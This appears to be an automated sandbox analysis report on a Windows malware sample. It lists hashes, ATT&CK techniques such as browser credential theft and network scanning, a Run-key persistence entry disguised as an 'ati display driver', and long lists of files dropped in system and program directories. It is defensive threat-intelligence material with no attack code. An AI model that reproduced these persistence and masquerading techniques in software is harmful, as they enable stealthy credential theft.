f15d4e50aaefacc9ef3e349de66e751e327c7b72d115b33d392a5d29a995eebd

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
20/07/2024, 02:22

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
Size

348KB
MD5

5eab0dffc5c17bce13d167e556b0b5da
SHA1

b0f7002e5d7ff7a65c3df353227031f18cdaa13a
SHA256

f15d4e50aaefacc9ef3e349de66e751e327c7b72d115b33d392a5d29a995eebd
SHA512

cf58f364fb646f9082de6847455f07884b9988f97492a149fe6ffdbcdc79304fbe1b57f2a23a3c142f283a697d95684951ad28c4eee8b7fe98243f760e9a2e9d
SSDEEP

6144:ppMM8EV1kmffCpJip7WDBDRTUDsDvA8X9S1:URmfaXiE1DmITA8a

Score

8^/10

discovery persistence spyware stealer

Malware Config

Signatures

Contacts a large (1178) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@"	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Fondue.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\hh.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\IME\IMEJP\IMJPDCT.EXE_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\PickerHost.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wecutil.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\compact.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\mstsc.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\newdev.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wbem\WMIADAP.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\dialer.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\eudcedit.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\TpmTool.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\verclsid.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\write.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\at.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\tcmsetup.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\choice.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\rasautou.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\setup16.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Dism\DismHost.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\schtasks.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wermgr.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\mmc.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\fontdrvhost.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\openfiles.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\auditpol.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\dpnsvr.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\odbcconf.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\CheckNetIsolation.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\edpnotify.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\msfeedssync.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\msinfo32.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\cmdl32.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\prevhost.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\taskkill.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\mode.com-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\fsutil.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\regedit.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wbem\mofcomp.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\WSManHTTPConfig.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wsmprovhost.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\WWAHost.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\CheckNetIsolation.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\DWWIN.EXE	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\mmgaserver.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\MuiUnattend.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\netsh.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SndVol.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\autoconv.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\choice.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\mmc.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\secinit.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SystemPropertiesPerformance.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wusa.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\BackgroundTransferHost.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\iscsicli.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\ByteCodeGenerator.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\cipher.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\net1.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SystemPropertiesComputerName.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\tree.com	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wscadminui.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\ByteCodeGenerator.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Windows Media Player\setup_wm.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files (x86)\Internet Explorer\ieinstal.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\excelcnv.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pj11icon.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\codecpacks.VP9.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\7-Zip\7zG.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\wsgen.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\SoundRec.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.106\Installer\setup.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\misc.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Java\jre-1.8\bin\tnameserv.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Win32Bridge.Server.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\VideoLAN\VLC\uninstall.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\GetHelp.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\msoasb.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-1000-0000000FF1CE}\misc.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Windows Media Player\wmpconfig.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pj11icon.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\MicrosoftEdgeUpdateCore.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\sscicons.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Windows NT\Accessories\wordpad.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.106\notification_helper.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\MicrosoftEdgeUpdateSetup.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\policytool.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\GameBar.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Maps.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\MicrosoftEdgeUpdate.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\jar.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\excelcnv.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\sscicons.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-1000-0000000FF1CE}\misc.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Client\AppVLP.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\xlicons.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\msoia.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\XLICONS.EXE-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\pwahelper.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\jps.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\wordicon.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-autoplay_31bf3856ad364e35_10.0.19041.1266_none_9a152e76298cd801\r\wmlaunch.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-client-li..m-service-migration_31bf3856ad364e35_10.0.19041.1052_none_0bde546bcaf8e34a\r\ClipUp.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-d..-warp-jitexecutable_31bf3856ad364e35_10.0.19041.1_none_83ab1c56c187ef65\Windows.WARP.JITService.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-where_31bf3856ad364e35_10.0.19041.1_none_13c446a37d881982\where.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-processmodel-cpt_31bf3856ad364e35_10.0.19041.1_none_6b184251474f0fac\w3wp.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-e..riseclientsync-host_31bf3856ad364e35_10.0.19041.1202_none_42d3a7d52bcb0f8d\WorkFolders.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.19041.1237_none_a6ef3a2e62766c5c\Setup.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-wordpad_31bf3856ad364e35_10.0.19041.1202_none_a27aa61d221bdc5c\wordpad.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.19041.1202_none_3fe90cdb6667211e\f\wevtutil.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-security-tools-nltest_31bf3856ad364e35_10.0.19041.1151_none_0f2f3a9cb1826509\f\nltest.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_netfx4-vbc_exe_b03f5f7f11d50a3a_4.0.15805.0_none_96edd00e05696409\vbc.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_windows-application..haringsvc-ntservice_31bf3856ad364e35_10.0.19041.84_none_c43e71af69351575\dstokenclean.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\Temp\PendingDeletes\8e36994536e5d701189b00001815341f.iisreset.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\bfsvc.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-gaming-ga..rnal-presencewriter_31bf3856ad364e35_10.0.19041.1202_none_76e6fb38a70dbd6d\f\GameBarPresenceWriter.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-analog-facefodhandler_31bf3856ad364e35_10.0.19041.1266_none_1f1ff89fbf279f16\r\FaceFodUninstaller.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.19041.153_none_47569e595c44e70c\f\FileExplorer.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-mapi_31bf3856ad364e35_10.0.19041.423_none_895925637881788e\r\fixmapi.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-wow64-legacy_31bf3856ad364e35_10.0.19041.1_none_ac040ccaa73c8c1b\user.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\x86_microsoft-windows-csvde_31bf3856ad364e35_10.0.19041.1_none_b5109d57c984cfcc\csvde.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-cloudnotifications_31bf3856ad364e35_10.0.19041.746_none_7000e6adf00c3d30\CloudNotifications.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.19041.1_none_202e011a312bab1d\runas.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.19041.153_none_47569e595c44e70c\r\FileExplorer.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-hvsi-manager_31bf3856ad364e35_10.0.19041.1202_none_7cdad2e52790705d\f\hvsimgr.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-a..ence-infrastructure_31bf3856ad364e35_10.0.19041.1_none_9556bb9420781f39\sdbinst.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AssignedAccessLockApp.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-shell-previewhost_31bf3856ad364e35_10.0.19041.746_none_2136afef5fadeaa4\prevhost.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.19041.264_none_309e9e4a939c0bac\cscript.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.19041.117_none_975feef459c69d6b\CheckNetIsolation.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-f..ysafety-refreshtask_31bf3856ad364e35_10.0.19041.1266_none_d375b5361b806b32\WpcTok.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-starttiledata_31bf3856ad364e35_10.0.19041.1202_none_05856bbd8f935e6b\r\DataStoreCacheDumpTool.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\msil_dfsvc_b03f5f7f11d50a3a_10.0.19041.1_none_26b5e44019fe7ae2\dfsvc.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_216932a6d29366ce\typeperf.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-settingsynchost_31bf3856ad364e35_10.0.19041.1_none_35d43a0ec2872060\SettingSyncHost.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-proquota_31bf3856ad364e35_10.0.19041.1_none_e80cafad6623705f\proquota.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-tcpip_31bf3856ad364e35_10.0.19041.746_none_49d38afb2289b178\f\netiougc.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft.powershell.pester_31bf3856ad364e35_10.0.19041.1_none_9478227a478f23d5\Pester.bat-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-container-manager_31bf3856ad364e35_10.0.19041.153_none_70cb6ca43c818606\cmimageworker.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-explorer_31bf3856ad364e35_10.0.19041.264_none_2f9647f4d89dc6f5\explorer.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.19041.1288_none_3f2d1be96237886e\f\wsmprovhost.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.19041.1202_none_5b834788c0d17953\f\iexplore.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_hyperv-compute-guestcomputeservice_31bf3856ad364e35_10.0.19041.1202_none_024525bdc81df50d\VmComputeAgent.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
